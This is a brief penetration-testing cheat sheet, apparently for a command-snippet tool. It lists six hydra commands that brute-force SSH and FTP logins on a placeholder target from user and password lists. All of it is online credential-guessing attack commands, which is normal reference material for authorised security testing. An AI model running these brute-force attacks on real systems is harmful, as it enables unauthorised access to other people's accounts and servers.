% hydra, fuzzing
  
# ssh - user/password file
hydra -L users.txt -P pass.txt <target> -t 16 ssh

# ftp - user/password file
hydra -L users.txt -P pass.txt <target> -t 16 ftp

# ssh - user file/static password
hydra -L users.txt -P <pass> <target> -t 16 ssh

# ftp - user file/static password
hydra -L users.txt -P <pass> <target> -t 16 ftp

# ssh - static user/password file
hydra -L <user> -P pass.txt <target> -t 16 ssh

# ftp - static user/password file
hydra -L <user> -P pass.txt <target> -t 16 ftp
